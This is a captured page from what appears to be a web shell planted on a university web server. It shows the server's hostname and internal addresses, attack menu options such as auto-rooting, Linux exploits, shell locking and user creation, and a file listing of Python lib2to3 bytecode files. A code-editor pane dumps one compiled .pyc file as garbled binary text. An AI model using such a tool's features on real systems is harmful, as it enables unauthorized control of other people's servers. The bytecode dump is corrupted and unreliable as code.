Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
lib2to3 /
fixes /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
fix_apply.cpython-310.pyc
1.61
KB
-rw-r--r--
fix_asserts.cpython-310.pyc
1.25
KB
-rw-r--r--
fix_basestring.cpython-310.pyc
661
B
-rw-r--r--
fix_buffer.cpython-310.pyc
806
B
-rw-r--r--
fix_dict.cpython-310.pyc
3.21
KB
-rw-r--r--
fix_except.cpython-310.pyc
2.71
KB
-rw-r--r--
fix_exec.cpython-310.pyc
1.1
KB
-rw-r--r--
fix_execfile.cpython-310.pyc
1.64
KB
-rw-r--r--
fix_exitfunc.cpython-310.pyc
2.25
KB
-rw-r--r--
fix_filter.cpython-310.pyc
2.38
KB
-rw-r--r--
fix_funcattrs.cpython-310.pyc
974
B
-rw-r--r--
fix_future.cpython-310.pyc
782
B
-rw-r--r--
fix_getcwdu.cpython-310.pyc
786
B
-rw-r--r--
fix_has_key.cpython-310.pyc
2.81
KB
-rw-r--r--
fix_idioms.cpython-310.pyc
3.81
KB
-rw-r--r--
fix_import.cpython-310.pyc
2.75
KB
-rw-r--r--
fix_imports2.cpython-310.pyc
544
B
-rw-r--r--
fix_imports.cpython-310.pyc
4.52
KB
-rw-r--r--
fix_input.cpython-310.pyc
948
B
-rw-r--r--
fix_intern.cpython-310.pyc
1.1
KB
-rw-r--r--
fix_isinstance.cpython-310.pyc
1.52
KB
-rw-r--r--
fix_itertools.cpython-310.pyc
1.51
KB
-rw-r--r--
fix_itertools_imports.cpython-310.pyc
1.53
KB
-rw-r--r--
fix_long.cpython-310.pyc
709
B
-rw-r--r--
fix_map.cpython-310.pyc
3
KB
-rw-r--r--
fix_metaclass.cpython-310.pyc
5.28
KB
-rw-r--r--
fix_methodattrs.cpython-310.pyc
936
B
-rw-r--r--
fix_ne.cpython-310.pyc
809
B
-rw-r--r--
fix_next.cpython-310.pyc
3
KB
-rw-r--r--
fix_nonzero.cpython-310.pyc
921
B
-rw-r--r--
fix_numliterals.cpython-310.pyc
1021
B
-rw-r--r--
fix_operator.cpython-310.pyc
4.05
KB
-rw-r--r--
fix_paren.cpython-310.pyc
1.35
KB
-rw-r--r--
fix_print.cpython-310.pyc
2.25
KB
-rw-r--r--
fix_raise.cpython-310.pyc
2.2
KB
-rw-r--r--
fix_raw_input.cpython-310.pyc
793
B
-rw-r--r--
fix_reduce.cpython-310.pyc
1.1
KB
-rw-r--r--
fix_reload.cpython-310.pyc
1.12
KB
-rw-r--r--
fix_renames.cpython-310.pyc
1.98
KB
-rw-r--r--
fix_repr.cpython-310.pyc
843
B
-rw-r--r--
fix_set_literal.cpython-310.pyc
1.64
KB
-rw-r--r--
fix_standarderror.cpython-310.pyc
718
B
-rw-r--r--
fix_sys_exc.cpython-310.pyc
1.38
KB
-rw-r--r--
fix_throw.cpython-310.pyc
1.76
KB
-rw-r--r--
fix_tuple_params.cpython-310.pyc
4.48
KB
-rw-r--r--
fix_types.cpython-310.pyc
1.9
KB
-rw-r--r--
fix_unicode.cpython-310.pyc
1.52
KB
-rw-r--r--
fix_urllib.cpython-310.pyc
5.74
KB
-rw-r--r--
fix_ws_comma.cpython-310.pyc
1.09
KB
-rw-r--r--
fix_xrange.cpython-310.pyc
2.47
KB
-rw-r--r--
fix_xreadlines.cpython-310.pyc
1.09
KB
-rw-r--r--
fix_zip.cpython-310.pyc
1.54
KB
-rw-r--r--
__init__.cpython-310.pyc
138
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fix_dict.cpython-310.pyc
o ��bc� � @ sj d Z ddlmZ ddlmZ ddlmZ ddlmZmZmZ ddlmZ ej dhB Z G dd � d ej�Zd S )aj Fixer for dict methods. d.keys() -> list(d.keys()) d.items() -> list(d.items()) d.values() -> list(d.values()) d.iterkeys() -> iter(d.keys()) d.iteritems() -> iter(d.items()) d.itervalues() -> iter(d.values()) d.viewkeys() -> d.keys() d.viewitems() -> d.items() d.viewvalues() -> d.values() Except in certain very specific contexts: the iter() can be dropped when the context is list(), sorted(), iter() or for...in; the list() can be dropped when the context is list() or sorted() (but not iter() or for...in!). Special contexts that apply to both: list(), sorted(), tuple() set(), any(), all(), sum(). Note: iter(d.keys()) could be written as iter(d) but since the original d.iterkeys() was also redundant we don't fix this. And there are (rare) contexts where it makes a difference (e.g. when passing it as an argument to a function that introspects the argument). � )�pytree)�patcomp)� fixer_base)�Name�Call�Dot)� fixer_util�iterc @ s@ e Zd ZdZdZdd� ZdZe�e�Z dZ e�e �Zdd� Zd S ) �FixDictTa power< head=any+ trailer< '.' method=('keys'|'items'|'values'| 'iterkeys'|'iteritems'|'itervalues'| 'viewkeys'|'viewitems'|'viewvalues') > parens=trailer< '(' ')' > tail=any* > c C s |d }|d d }|d }| j }|j}|�d�}|�d�} |s"| r(|dd � }|dv s2J t|���d d � |D �}dd � |D �}| oH| �||�} |t�|jt� t ||j d�g�|d �� g }t�|j|�}| sz| szd|_ t t |rtdnd�|g�}|r�t�|j|g| �}|j |_ |S )N�head�method� �tailr �view� )�keys�items�valuesc S � g | ]}|� � �qS � ��clone��.0�nr r �-/usr/lib/python3.10/lib2to3/fixes/fix_dict.py� <listcomp>A � z%FixDict.transform.<locals>.<listcomp>c S r r r r r r r r B r )�prefix�parens� �list)�syms�value� startswith�repr�in_special_contextr �Node�trailerr r r r �powerr ) �self�node�resultsr r r r"